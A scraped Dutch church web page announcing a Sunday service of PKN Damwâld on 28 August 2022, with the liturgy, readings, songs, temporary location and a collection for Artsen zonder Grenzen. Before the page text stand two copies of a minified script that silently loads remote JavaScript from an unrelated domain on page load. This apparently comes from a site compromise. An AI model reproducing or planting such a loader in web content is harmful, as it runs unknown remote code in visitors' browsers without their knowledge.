;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 28 augustus 2022 9:30 uur - PKN Damwâld
zondag 28 augustus 2022
09:30 uur
LET OP ! DIENST IN BONIFATUSKERK VANWEGE VERBOUWING DE ONTMOETING!

Kerkdienst zondag 28 augustus 2022 9:30 uur

Thema: "Kom tot Mij"

Informatie

Voorganger:Robert Colijn
Organist:Nienke van der Heide-Visser
Thema:"Kom tot Mij"
Mededeling:LET OP ! DIENST IN BONIFATUSKERK VANWEGE VERBOUWING DE ONTMOETING!
LivestreamDienst terugkijken
Bekijk op Youtube
Liturgie
Intochtslied Gezang 444 (oude liedboek)
Stilgebed, Welkom, Votum en Groet
Gebed om vergeving
We zingen: NLB 885
Genadebelofte .
We zingen: Groot is Hij
Gebed
We lezen: Romeinen 14: 1-9 NBV
We zingen: Welk een vriend is onze Jezus
We lezen: Mattheus 11:25-30 NBV
Preek "Kom tot Mij"
Vraag van de week
We zingen: Opwekking 430
Voorbede / Dankgebed / Onze Vader
Slotlied Gezang 255 (oude liedboek)
Zegen
Collecte
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Artsen zonder Grenzen (collectenr. 22083)

Teams van experts werken dag en nacht om mensen in crisissituaties te helpen. Ze bieden medische noodhulp in conflictgebieden, bij natuurrampen en uitbraken van dodelijke ziektes. Als ze onrecht zien, zal de wereld het weten. Ze sluiten niemand uit en laten zich niet tegenhouden. De zorg die ze verlenen varieert van basiszorg, vaccinatieprogramma’s, tot specialistische chirurgie in een ziekenhuis. Ze begeleiden zwangere vrouwen, brengen baby’s ter wereld of bieden psychosociale hulp in mentaal zware situaties. Met uw steun kunnen ze medische noodhulp bieden en levens redden.

Uitganscollecte: Bij de uitgang of via QR-code